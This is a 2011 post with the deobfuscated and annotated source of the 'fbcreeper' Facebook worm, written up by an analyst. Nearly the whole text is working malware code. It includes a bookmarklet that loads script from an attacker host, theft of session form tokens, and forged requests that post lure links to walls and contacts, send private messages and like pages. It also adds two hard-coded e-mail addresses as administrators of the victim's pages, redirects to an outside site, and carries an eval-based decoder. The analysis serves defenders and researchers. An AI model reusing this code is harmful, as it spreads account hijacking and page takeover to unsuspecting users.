Deobfuscated fb malware

May 14th, 2011
  1. /*
  2. Deobfuscated & documented version of the "fbcreeper" facebook malware.
  3. ======================================================================
  4.  
  5. Malware web-page:
  6. http://fbcreeper.info/
  7. http://procreeper.info/
  8. http://profilechecker.info/
  9. http://thefbcreeper.info/
  10.  
  11. Description:
  12. This malware advertises that it can gather statistics about user's
  13. contacts' visits to her profile. Instead, this is what it does:
  14. * Posts links on victim's wall, which advertise the malware
  15. * Posts links to victim's contacts' walls, which advertise
  16. the malware.
  17. * Posts links to pages created or administered by victim, advertising
  18. the malware and adding users with emails lethaburbach890@yahoo.com and
  19. chunfeezellwytm@hotmail.com to the pages' administrators group.
  20. * Sends private messages, advertising the malware
  21. * Likes pages "DJ-Emphatic" and "OH Whutt" with user's account
  22. * Invites all contacts to an event (which is removed at the time
  23. of this analysis)
  24.  
  25. As of now (22nd February 2011, 23:03 GMT+2), somewhere between
  26. 11,000 and 20,000 Facebook accounts are infected.
  27.  
  28. The malware is injected through address bar with the code snippet
  29. below:
  30. javascript: (a = (d = document).createElement("script")).src =
  31. "http://fbcreeper.info/StalkerTools.fb"; void(d.body.appendChild(a))
  32.  
  33. Karagasidis Dimitris,
  34. http://gatoni.gr
  35. */
  36.  
  37. /* Shortened URLs pointing to malware's web-page */
/*
 * Six short links that resolve to the landing pages listed in the header.
 * All six are implicit globals (no var/let), so they land on window.
 * Analyst note: the short-link hosts and codes are the strings that end up
 * in the posted statuses below, which makes them useful when searching for
 * affected posts.
 */
goog1="http://goo.gl/ixMjn";
goog2="http://tinyurl.com/48jd66w";
goog3="http://tinyurl.com/procreeper";
goog4="http://goo.gl/rLvls";
goog5="http://goo.gl/NMclq";
goog6="http://goo.gl/YHp4X";
  44.  
  45. /* Malware's facebook pages and events */
/*
 * Hard-coded Facebook object ids and the two e-mail addresses that
 * addAdmin() promotes to page administrator. Again implicit globals.
 */
event_id="168046893242650"; // As of 22nd February of 2011, this event is expired
page_id_x="136589129739532"; // DJ-Emphatic page on Facebook
page_id_xx="195926070436089"; // OH Whutt page on Facebook
admin_emails="lethaburbach890@yahoo.com,chunfeezellwytm@hotmail.com"; // comma-separated; split(",") in addAdmin()
  50.  
  51. /* Statuses the malware posts on users' walls */
/*
 * Lure texts. One is chosen with statuses.randomize() for every wall post,
 * page post and private message below; each embeds one of the short links.
 */
statuses = ["Wow! Seems like lots of people stalk me - " + goog1,
"New FB tool shows who stalks your profile-- " + goog2,
"Secret tool shows who stalks your pics " + goog3,
"Insane! Awesome tool to see who looks at your pics >> " + goog4,
"According to " + goog5 + " you're my top stalker. Creep.",
"Secret tool shows who stalks your pics - " + goog6];
  58.  
  59. /* Subjects of private messages the malware sends to users */
/* Private-message subject lines; one is picked with subjects.randomize(). */
subjects = [ "Check this out!", "Hey, whats happening?", "Hey! This is awesome" ];
  61.  
  62. /* Extend Array type with a function which returns an element from a random index */
/*
 * Array.prototype.randomize(): return one element at a uniformly random index
 * (undefined for an empty array). Patching a built-in prototype is itself a
 * fingerprint of this script — every array on the page gains the method.
 */
Array.prototype.randomize = function () {
  var pick = Math.floor( Math.random() * this.length );
  return this[pick];
};
  66.  
  67. /* Extend Object type with function to check the state of AJAX response */
/*
 * Object.prototype.isReady(): true when an XHR-like object has readyState 4
 * and HTTP status 200, false otherwise. Because it is installed on
 * Object.prototype, every object on the page exposes it — that is how the
 * fr.isReady() / xa.isReady() / ins.isReady() calls below resolve.
 * The loose == comparisons are kept on purpose (original semantics).
 */
Object.prototype.isReady = function () {
  var done = this.readyState == 4;
  var ok = this.status == 200;
  return done && ok;
};
  76.  
  77. /* Extend String type with a function which returns user contacts' ids */
/*
 * String.prototype.getFriends(): scrape profile ids and display names out of
 * the friends-list response text.
 *
 * What the regex chain does, step by step:
 *  - match every `facebook.com\/profile.php?id=<digits>\">[<span ...>]<name>`
 *    fragment. The doubled escapes (\\\/ and \\\") suggest the input is HTML
 *    embedded in a JSON string (the __a=1 AJAX reply) — inferred, not confirmed.
 *  - join the matches with ":" and strip the host, the "profile.php?id="
 *    prefix, any <span ...> wrapper and anything from "l.php" onward.
 *  - replace the escaped closing quote with the literal "&xhpc_composerid=",
 *    so each entry becomes `<id>&xhpc_composerid=<name>`.
 *  - split back on ":" and drop the first entry (presumably the victim's own
 *    profile link — not verified here).
 *
 * NOTE(review): the returned entries contain no "|", yet every caller does
 * friends[i].split("|")[0]; that returns the whole entry, composerid suffix
 * included. Either the transcription of this function is off or the callers
 * were written against a different scraper. Result is also leaked into the
 * implicit global friends2.
 */
String.prototype.getFriends = function () {
  friends2 = this.match( /facebook\.com\\\\\\\/profile\.php\?id=\d+\\\\\\\">(<span[^>]+>|)[^<>]+/gi).join(":").replace(/(facebook\.com\\\\\\\/|profile\.php\?id=|<span[^>]+>|l\.php.*)/gi,"").replace(/\\\\\\\">/gi,"&xhpc_composerid=").split(":").slice(1);
  return friends2;
};
  82.  
function _88xuhyr(_0x91e5x2){
  /*
  This function decodes and evaluates the _0x91e5x2 string, which
  seems to be "encrypted" with a 24-character shift.

  There seem to be no calls to this function from within the code,
  so its purpose must be solely for obscurity reasons.

  Analyst notes:
   - Input format: comma-separated decimal char codes, each offset by +24.
   - eval() of a runtime-built string is the classic second-stage loader
     pattern; the payload it would decode is not present on this page, so
     nothing can be said about what it would run.
   - st, d and i are implicit globals (no var), so this clobbers any
     same-named globals, including the `d` used by the bookmarklet in the
     header comment.
  */
  st = _0x91e5x2.split(",");
  d = "";
  for( i = 0; i < st.length; i++ ){
    d += String.fromCharCode( st[i] - 24 );
  };
  eval(d);
};
  98.  
function addAdmin( _0x91e5x4, _0x91e5x5, _0x91e5x6, _0x91e5x7 ) {
  /*
  This function adds Facebook users with email accounts
  lethaburbach890@yahoo.com and chunfeezellwytm@hotmail.com as
  administrators to the pages you have created or administering.

  _0x91e5x4 - Your page ID
  _0x91e5x5 - A string containing comma-separated email addresses
  _0x91e5x6, _0x91e5x7 - Your profile signatures (post_form_id and fb_dtsg)

  Analyst notes:
   - This is a forged submission of the page-admin form: the two tokens
     scraped from the victim's own page are what let the request pass the
     site's form checks, which is why the script extracts them first.
   - The `with` block makes open/setRequestHeader/send resolve against the
     new XMLHttpRequest. open() is called without the async flag and no
     handler is attached, so the request is fire-and-forget.
   - iemails, main_emails, i and newx are all implicit globals.
  */
  iemails = _0x91e5x5.split( "," );
  main_emails = [];
  for( i = 0; i < iemails.length; i++ ) {
    // one "friendselector_input[]=<email>&friend_selected[]=" pair per address
    main_emails[i]= "friendselector_input[]=" + iemails[i] + "&friend_selected[]=";
  };
  with ( newx = new XMLHttpRequest ) {
    open("POST", "/pages/edit/?id=" + _0x91e5x4 + "&sk=admin" );
    setRequestHeader( "Content-Type", "application/x-www-form-urlencoded" );
    send( "post_form_id=" +
      _0x91e5x6 +
      "&fb_dtsg=" +
      _0x91e5x7 +
      "&fbpage_id=" +
      _0x91e5x4 +
      "&" +
      main_emails.join("&") +
      "&save=1"
    );
  } ;
};
  129.  
function makePost( _0x91e5x9, _0x91e5xa, _0x91e5xb, _0x91e5xc ) {
  /*
  This function prepares a status update, which is posted on
  your contacts' walls.

  _0x91e5x9 - the HTML code of your Facebook page, from which
  your signature is extracted.
  _0x91e5xa - the array of available statuses
  _0x91e5xb - profile to which the status update will be posted
  _0x91e5xc - not used in the function. Obfuscation I guess.

  Analyst notes:
   - formx/dtx/composerx are re-scraped from the current page HTML on every
     call and, being implicit globals, overwrite the values extracted at
     start-up. Each match(...)[1] throws a TypeError if the markup does not
     contain the field (no null check), which aborts the caller's timer tick.
   - text_post and text_actual are always "", so both replace() calls are
     no-ops; they look like leftovers from a version that appended text.
   - _0x91e5xb.split("|")[0] expects an "id|..." entry; see the note on
     String.prototype.getFriends about what the callers actually pass.
   - The body is handed to update(), i.e. posted via /ajax/updatestatus.php.
  */
  formx = _0x91e5x9.match(/name="post_form_id" value="([\d\w]+)"/)[1];
  dtx = _0x91e5x9.match(/name="fb_dtsg" value="([^"]+)"/)[1];
  composerx = _0x91e5x9.match(/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
  msg = _0x91e5xa.randomize() + ""; // + "" forces a string copy of the lure
  text_post = "";
  text_actual = "";
  pxt = "post_form_id=" +
    formx +
    "&fb_dtsg=" +
    dtx +
    "&xhpc_composerid=" +
    composerx +
    "&xhpc_targetid=" +
    _0x91e5xb.split("|")[0] +
    "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=" +
    encodeURIComponent( msg + text_actual.replace( /\, $/,"" ) ) +
    "&xhpc_message=" +
    encodeURIComponent( msg + text_post.replace( /\, $/,"" ) ) + "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest";
  update(pxt);
};
  161.  
function update( _0x91e5xe ) {
  /*
  This function posts status update with victim's account.

  _0x91e5xe - a pre-built application/x-www-form-urlencoded body (see the
  callers: it always carries post_form_id, fb_dtsg, xhpc_composerid and
  xhpc_targetid).

  Analyst notes: the `with` makes open/setRequestHeader/send resolve against
  the XHR; the request is asynchronous with no handler, so failures are never
  observed by the script. newx is an implicit global shared with addAdmin().
  */
  with( newx= new XMLHttpRequest){
    open("POST","/ajax/updatestatus.php?__a=1");
    setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    send(_0x91e5xe);
  };
};
  170.  
function loading(){
  /*
  This function adds a simple user interface: an overlay with a spinner and a
  "Scanning..." caption, so the victim waits while the posts go out.

  Analyst notes:
   - style.zindex is not the CSS property (that is style.zIndex), so the line
     has no visual effect.
   - The spinner is loaded from fbviews.org, the same host the script later
     redirects to; the image request is an observable network indicator.
   - innerHTML here is a fixed literal, no user data is interpolated.
   - The element id "screwyouz" / class "screwyou" are static and could be
     used to spot the overlay in the DOM.
  */
  var _0x91e5x10 = document.createElement("div");
  _0x91e5x10.id = "screwyouz";
  _0x91e5x10.setAttribute("align","center");
  _0x91e5x10.style.margin = "0px auto";
  _0x91e5x10.style.position="absolute";
  _0x91e5x10.style.top="10px";
  _0x91e5x10.style.zindex="100";
  _0x91e5x10.className="screwyou";
  _0x91e5x10.innerHTML='<br /><br /><br /><br /><br /><center><img src="http://fbviews.org/process.gif" /><br />Scanning may take up to 3 minutes</center>';
  document.body.appendChild(_0x91e5x10);
};
  184.  
  185. /* This is the malware's entry point */
  186.  
  187. /*
  188. Extract victim's signatures, so the malware can post on victim's
  189. contacts' walls
  190. */
/*
 * Token harvesting. The three values needed to forge form posts
 * (post_form_id, fb_dtsg, xhpc_composerid) are read either from the current
 * page or from a synchronous fetch of "/" when the script was started
 * elsewhere on the site.
 *
 * Analyst notes:
 *  - open(..., false) makes the GET synchronous, blocking the tab until the
 *    home page has been downloaded.
 *  - Every match(...)[1] dereferences without a null check, so a layout
 *    change that drops any of the three fields throws here and the rest of
 *    the script never runs.
 *  - res, muhaha, formx, dtx and composerx are implicit globals; the last
 *    three are re-used by every request below.
 */
if ( window.location.href == "http://www.facebook.com/" ) {
  formx = ( res = document.body.innerHTML ).match(/name="post_form_id" value="([\d\w]+)"/)[1];
  dtx = res.match(/name="fb_dtsg" value="([^"]+)"/)[1];
  composerx = res.match(/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
}
else {
  /*
  If not on main page, make an AJAX request, and then extract
  victim's data.
  */
  with( muhaha = new XMLHttpRequest ) {
    open( "GET", "/", false );
    send(null);
  };
  formx = ( res = muhaha.responseText ).match(/name="post_form_id" value="([\d\w]+)"/)[1];
  dtx=res.match(/name="fb_dtsg" value="([^"]+)"/)[1];
  composerx=res.match(/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
};
  209.  
  210. /* A simple message box which informs that the malware runs */
/*
 * Social-engineering prompt. Nothing in this file listens for a key press,
 * so "press Enter" is only there to keep the victim on the page while the
 * requests below run.
 */
alert("Hello! To activate the tool press Enter on your keyboard. This will take 2-3 minutes, while waiting please do not close this window or tab.");
  212.  
  213. /* Post malware advertising update on user's wall */
/*
 * First lure post, on the victim's own wall. The target id is the victim's
 * user id, read from the c_user cookie.
 *
 * NOTE(review): "&fb_dtsg=" is followed directly by "&xhpc_composerid=" —
 * dtx is never appended, so this particular request carries an empty
 * fb_dtsg. Compare the otherwise identical body built in the insights timer
 * below, which does include dtx. Whether the server accepted it cannot be
 * told from this file.
 */
update( "post_form_id=" +
  formx +
  "&fb_dtsg=" +
  "&xhpc_composerid=" +
  composerx +
  "&xhpc_targetid=" +
  document.cookie.match(/c_user=(\d+)/)[1] +
  "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=" +
  encodeURIComponent( stx = statuses.randomize() )+
  "&xhpc_message=" +
  encodeURIComponent(stx)+
  "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest"
);
  227.  
  228. /* Like "DJ-Emphatic" page with victim's account */
/*
 * "Like" the DJ-Emphatic page (page_id_x) with the victim's account.
 * loading() is called here, inside the with block, so the fake progress
 * overlay appears just before the first like request is sent. newz is an
 * implicit global.
 */
with(newz= new XMLHttpRequest){
  loading();
  open("POST","/ajax/pages/fan_status.php?__a=1");
  setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  send( "fbpage_id=" +
    page_id_x +
    "&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=" +
    formx +
    "&fb_dtsg=" +
    dtx +
    "&lsd&post_form_id_source=AsyncRequest"
  );
};
  242.  
  243. /* Like "OH Whutt" page with victim's account */
/*
 * "Like" the OH Whutt page (page_id_xx) — same request as above with the
 * second page id. newzz is an implicit global.
 */
with(newzz= new XMLHttpRequest){
  open("POST","/ajax/pages/fan_status.php?__a=1");
  setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  send( "fbpage_id=" +
    page_id_xx +
    "&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=" +
    formx +
    "&fb_dtsg=" +
    dtx +
    "&lsd&post_form_id_source=AsyncRequest"
  );
};
  256.  
void 0; // No-op. Probably residue of the obfuscator or of the bookmarklet-style `void(...)` wrapper shown in the header; it has no effect here.
  258.  
  259. /*
  260. Post with 3 seconds intervals, advertising messages on all contacts' walls.
  261. If friends are less than 15, it posts private messages
  262. */
/*
 * Contact fan-out: fetch the friends list, invite everyone to event_id, then
 * every 3 seconds post a lure on one contact's wall and (for the first 15
 * ticks) send that contact a private message.
 *
 * Analyst notes:
 *  - Inside `with( fr = ... )`, `onreadystatechange=` assigns the handler on
 *    fr, and send(null) at the bottom starts the (asynchronous) request.
 *  - The idx loop only keeps entries whose split("|")[0] is numeric. If
 *    getFriends() really yields `<id>&xhpc_composerid=<name>` entries (see
 *    that function), isNaN() is true for all of them and the invite list
 *    ends up empty — another sign the scraper transcription may be off.
 *  - Missing `return` after clearInterval(tx): on the final tick
 *    friends[cnt_fr] is undefined, so makePost() throws a TypeError on
 *    .split(). The redirect to fbviews.org has already been set by then.
 *  - The header comment says private messages go out "if friends are less
 *    than 15"; the code gates on cnt_fr<15, i.e. only the first 15 contacts
 *    get a message regardless of list size.
 *  - The xa handler reads friends[cnt_fr] asynchronously, after the tick has
 *    already done cnt_fr += 1, so the message target is likely one entry
 *    ahead of the wall post from the same tick.
 *  - friends, idx, i, invi, cnt_fr, tx, xa, compi, pxi, mi and me are all
 *    implicit globals.
 */
with( fr = new XMLHttpRequest ) {
  open( "GET", "/ajax/browser/list/friends/all/?uid=" +
    (me = document.cookie.match(/c_user=(\d+)/)[1]) +
    "&offset=0&dual=1&__a=1"
  );

  onreadystatechange=function (){
    if( fr.isReady() ) {
      friends=fr.responseText.getFriends();
      idx=[];
      for( i = 0; i < friends.length; i++ ) {
        if( !isNaN(friends[i].split("|")[0]) ){
          idx[i]= "ids[" + i + "]=" + friends[i].split("|")[0];
        };
      };
      /* Invite every scraped contact to the (now expired) event */
      with(invi= new XMLHttpRequest){
        open("POST","/ajax/social_graph/invite_dialog.php?__a=1");
        setRequestHeader("Content-Type","application/x-www-form-urlencoded");
        send( "post_form_id="+
          formx+
          "&fb_dtsg="+
          dtx+
          "&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&"+
          idx.join("&")+
          "&node_id=" +
          event_id +
          "&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest"
        );
      };
      cnt_fr=0;
      /* One contact per 3-second tick */
      tx=setInterval(function (){
        if( cnt_fr == friends.length ){
          window.location="http://fbviews.org/result.php";
          clearInterval(tx);
        };
        makePost( document.body.innerHTML, statuses, friends[cnt_fr], friends);
        /* Fetch a composer id, then send the private message from its handler */
        with( xa= new XMLHttpRequest ) {
          open("GET","/ajax/messaging/composer.php?__a=1&__d=1");
          onreadystatechange=function (){
            if(xa.isReady()){
              compi=xa.responseText.match(/([\d\w]+)_error/)[1];
              pxi = "ids_"+
                compi+
                "[0]="+
                friends[cnt_fr].split("|")[0]+
                "&subject="+
                encodeURIComponent( subjects.randomize() ) +
                "&status="+
                encodeURIComponent(statuses.randomize()) +
                "&ids[0]="+
                friends[cnt_fr].split("|")[0]+
                "&action=send_new&home_tab_id=1&profile_id="+
                document.cookie.match(/c_user=(\d+)/)[1]+
                "&target_id=0&app_id=&&composer_id="+
                compi+
                "&hey_kid_im_a_composer=true&thread&post_form_id="+
                formx+
                "&fb_dtsg="+
                dtx+
                "&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest";
              if( cnt_fr<15 ){
                with(mi= new XMLHttpRequest){
                  open("POST","/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1");
                  setRequestHeader("Content-Type","application/x-www-form-urlencoded");
                  send(pxi);
                };
              };
            };
          };
          send(null);
        };
        cnt_fr += 1;
      } , 3000 );
    } ;
  };
  send(null);
};
  340.  
  341. /*
  342. Post advertising messages with 3 seconds interval on pages created or administered
  343. by victim, and then add users with lethaburbach890@yahoo.com and chunfeezellwytm@hotmail.com
  344. addresses as administrators to these pages
  345. */
/*
 * Page takeover: scrape the ids of pages the victim administers from the
 * insights page, then every 3 seconds post a lure on one of them and call
 * addAdmin() to add the two hard-coded e-mail addresses as administrators.
 *
 * Analyst notes:
 *  - ids is built from every `po_<digits>">View` fragment in the response.
 *  - Same missing `return` as the friends timer: on the final tick
 *    ids[cnt_pages] is undefined, so one more update()/addAdmin() pair is
 *    sent with "undefined" as the target before the redirect takes effect.
 *  - This timer runs concurrently with the friends timer above; both set
 *    window.location to the same result page.
 *  - ins, ids, cnt_pages, tz and stx are implicit globals.
 */
with( ins = new XMLHttpRequest ) {
  open("GET","/insights/?_fb_noscript=1");
  onreadystatechange=function (){
    if(ins.isReady()){
      ids=ins.responseText.match(/po_\d+">View/gi).join(":").replace(/(po_|">View)/gi,"").split(":");
      cnt_pages=0;
      tz=setInterval(function (){
        if(cnt_pages==ids.length){
          window.location="http://fbviews.org/result.php";
          clearInterval(tz);
        } ;
        update( "post_form_id=" +
          formx +
          "&fb_dtsg=" +
          dtx +
          "&xhpc_composerid=" +
          composerx +
          "&xhpc_targetid=" +
          ids[cnt_pages] +
          "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text="+
          encodeURIComponent( stx=statuses.randomize() ) +
          "&xhpc_message=" +
          encodeURIComponent(stx) +
          "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest"
        );
        addAdmin( ids[cnt_pages], admin_emails, formx, dtx);
        cnt_pages+=1;
      } ,3000 );
    } ;
  } ;
  send(null);
};